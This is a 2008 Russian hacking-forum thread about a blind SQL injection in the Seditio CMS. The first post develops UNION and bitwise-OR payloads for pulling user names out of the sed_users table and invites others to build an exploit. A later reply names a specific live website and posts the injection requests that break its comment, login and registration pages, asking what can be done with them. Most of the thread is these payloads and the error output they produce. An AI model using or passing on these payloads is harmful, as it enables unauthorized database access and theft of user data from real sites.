Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Seditio Remote Blind SQL Injection (https://forum.antichat.xyz/showthread.php?t=67515)

Евгений Минаев 16.04.2008 20:15
Seditio Remote Blind SQL Injection
 


SEDITIO, ранее Neocrome, а еще ранее LDU обзавелся новым багом, реализовать который было куда интереснее, нежели обычную иньекцию, пусть даже слепую. Все дело осложняется тем, что данные из формы обрамляются запятыми с обоих сторон для последующего помещения в поисковый запрос. Уязвимым является параметр для поиск юзера в отправке личных сообщений.

Подготавливаем запрос, учитывая облом с обрамлением запятых

Цитата:
mysql> ') or 1=2 union select `user_name` ',xek' from sed_users/*')
-> ') or 1=2 union select `user_name` '','xek' from sed_users/*')
И получаем очередной облом - первое поле не выводится. В течение получаса было перепробавана куча вариантов, были подключены тоха и подкащей, но mysql во всех на первый взгял верных запросах возвращал ноль.

Цитата:
mysql> =') or 1=2 union select 123','`username`/*''*/ from sed_users/*')
-> ') or 1=2 union select 123'',''`username`/*''*/ from sed_users/*')

mysql> ') or 1=2 union select user_name+','+user_name from sed_users/*')
-> ') or 1=2 union select user_name+'',''+user_name from sed_users/*')

mysql> ') or 1=2 union select user_name+','+`user_name`+'' from sed_users/*
-> ') or 1=2 union select user_name+'',''+`user_name`+'' from sed_users/*
Вариант с подзапросами и перебором я отбросил сразу, уж слишком много запятых требовалось экранировать, да и не получалось xD Тогда на помощь пришел dev.mysql.com который сообщил мне о поразрядных функциях, вкратце напомню

Цитата:
mysql> SELECT 1 | 1 -- поразрядное или
-> 1

mysql> SELECT 15 & 19 -- поразрядное и
-> 13

mysql> SELECT 1 ^ 0 -- поразрядное исключающее или
-> 1
Помимо этих трех есть еще поразрядный сдвиг и инвертирование, но нам для запроса понадобятся лишь эти, точнее один из них. Это единственные функции в mysql, которые позволяют сравнивать числа с нулевой строкой и при этом даже получать результат xD

Цитата:
mysql> ') or ascii(substring((select user_name from sed_users limit 1)|',1'|',1'|''))>0/*
-> 1
mysql> ') or ascii(substring((select user_name from sed_users limit 1)|',1'|',1'|''))<0/*
-> 0
Описание этой баги отказались принять на милворм, потому что stroke не разобрался, решил опубликовать тут, может кто и напишет эксплоит


underWHAT?!

Scipio 17.04.2008 00:29
Какие версии уязвимы? Оффсайт не работает что-то, сам хочу посмотреть

Neoclub 24.04.2008 10:06
Оффсайт работает http://www.neocrome.ru/ анлг соответственно .net

На сайте sumclub.ru который работает на движке Seditio обнаружел сдедующие уязвимости

Запрос для выполнения SQL инъекции:
http://sumclub.ru/forum/comments.php?id=1'

Результат работы

<...>
pfOjA6XzpzdW1jbHViX25ldw%3D%3D; expires=Fri, 19-Jun-2037 18:54:00 GMT

MySQL error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1\' ORDER BY com_id ASC' at line 1
<...>


Запрос для выполнения SQL инъекции:

POST /forum/auth.php?m=login&a=check&redirect= HTTP/1.1
Host: sumclub.ru
Content-Type: application/x-www-form-urlencoded
Content-Length: 40

rusername='&rpassword=1&rcookiettl=1&x=1


Результат работы

<...>
A6XzpzdW1jbHViX25ldw%3D%3D; expires=Fri, 19-Jun-2037 19:36:09 GMT

a3
MySQL error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\'' at line 1
0


Запрос для выполнения SQL инъекции:

POST /forum/auth.php?m=register&a=add HTTP/1.1
Host: sumclub.ru
Content-Type: application/x-www-form-urlencoded
Content-Length: 87

rusername=1&remail='&rpassword1=1&rpassword2=1&rlo cation=1&roccupation=1&x=1&rcountry=1



Результат работы

<...>
A6XzpzdW1jbHViX25ldw%3D%3D; expires=Fri, 19-Jun-2037 19:55:15 GMT

a3
MySQL error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\'' at line 1
0


что можно с этм зделать

помино обнаружено

Доступен метод TRACE

Слабая криптография
Версии протокола 1.33 и 1.5 недостаточно защищены криптографически.


Время: 18:05